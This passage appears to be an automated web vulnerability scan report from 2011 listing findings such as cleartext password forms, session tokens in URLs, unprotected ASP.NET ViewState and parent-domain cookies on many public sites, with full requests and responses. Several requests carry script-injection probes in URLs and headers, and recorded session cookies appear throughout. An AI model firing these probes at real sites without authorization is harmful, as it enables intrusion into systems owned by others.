<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Redirection</TITLE>
</HEAD>
<BODY>
<H2>Redirection</H2>
<A HREF="http://rateyourmusic.com/favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1&413d0">
...[SNIP]...

3. Cleartext submission of password
There are 2 instances of this issue:


3.1. http://ecards.myfuncards.com/myfuncards/404

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecards.myfuncards.com
Path:   /myfuncards/404

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /myfuncards/404 HTTP/1.1
Host: ecards.myfuncards.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 /myfuncards/404
Date: Fri, 01 Apr 2011 15:58:17 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84745


                   
...[SNIP]...
</div>
                       <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                           <input name="loginEmail" id="loginEmail" class="inp-text" type="text" value="Email Address" />
                           <input name="loginPassword" id="loginPassword" class="inp-text" type="password" value="" />
                           <input class="inp-submit Clickable" type="submit" value="" />
...[SNIP]...

3.2. http://www.androidtapp.com/wp-login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /wp-login.php HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:58 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Content-Length: 2231
Vary: User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <ti
...[SNIP]...
</h1>

<form name="loginform" id="loginform" action="http://www.androidtapp.com/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

4. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=357&token=EMON1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; C2W4=3TQwcI7gaOg8elrf0zppGQ5W8-kjh6AzvbIlXPAjnP9LEy1n0VWmaZA; cr=15|1|-8589001706530866039|1%0a2|1|-8588996610000594670|2; V=GlchrMbA1MSR; cwbh1=357%3B03%2F30%2F2011%3BEHEX1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Mon, 26-Mar-2012 18:11:06 GMT; Path=/
Set-Cookie: cwbh1=357%3B05%2F01%2F2011%3BEMON1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078; Domain=.contextweb.com; Expires=Sat, 05-Mar-2016 18:11:06 GMT; Path=/
Content-Type: image/gif
Date: Fri, 01 Apr 2011 18:11:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5. ASP.NET ViewState without MAC enabled
There are 2 instances of this issue:


5.1. http://www.maybenow.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.maybenow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maybenow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:02:17 GMT
Content-Length: 13703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

5.2. http://www.nabiscoworld.com/favicon.ico

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nabiscoworld.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nabiscoworld.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 9405
Vary: Accept-Encoding
Cache-Control: private, max-age=86380
Date: Fri, 01 Apr 2011 15:44:48 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<TITLE>NabiscoWorld.com</TITLE>
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cach
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="dDwxMDI4NDU1MzYxOztsPE1haW5fbmF2MTpNYWluX25hdl9saW5rczE6aWJsb2dpbk9uOz4+" />
...[SNIP]...

6. Cookie scoped to parent domain
There are 122 instances of this issue:


6.1. http://www.888.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.888.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.888.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:09:33 GMT
Server: Microsoft-IIS/6.0
srv: 2341432
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MainCookie=OSR=486413&RefType=NoReferrer&Srv=NO-01&Lang=en; domain=888.com; expires=Sun, 01-Apr-2012 16:09:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=42exmk55tdj1cneietsdoz45; domain=.888.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21300


<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>

<script type="text/javascript">

var sFlag = "";

var sCut = "sr=486413&lang=en&ic=5&mkw=&TestData=%3cxml%3e%3cReferrer%3e%
...[SNIP]...

6.2. http://www.dogpile.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2de9fa38eedf4cf59191c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:48 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:48 GMT
Connection: close
Content-Length: 45583
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.3. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /clickcallbackserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=4JUfDDVL66gTuUrCiPIdbg%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:53 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:01 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:01 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:00 GMT
Connection: close
Content-Length: 4



6.4. http://www.dogpile.com/clickserver/_iceUrlFlag=1

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /clickserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fwww.dailydealfetcher.com&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&13=search&14=295&15=internal-nav&40=dXWTs3St9FfdeGdDtrJdnw%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:53 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dailydealfetcher.com
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:13 GMT
Connection: Keep-Alive
Content-Length: 1216
Vary: Accept-Encoding, User-Agent

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dailydealfetcher.com">here</a>.</h2>
</body></html>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tra
...[SNIP]...

6.5. http://www.dogpile.com/dogpile/ws/about/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/about/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/about/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=136fb87258794bf0868fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:26 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:26 GMT
Connection: close
Content-Length: 44997
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.6. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=530d17a155f848679bfdc16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=bfbe830ac1c64c0a810fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:24 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:24 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:24 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 44993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.7. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/contactus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8bf114849f6a409d9c06c16a3af0cb01&ActionId=2d7a6054427c4593a5ccc16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=51412009a454492dac79c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:53 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:53 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:12:52 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.8. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f4a5e3c498ee4fafa621c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=ba008f1978f546de8f2dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:31 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.9. http://www.dogpile.com/dogpile/ws/faq/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile/ws/faq/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/faq/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
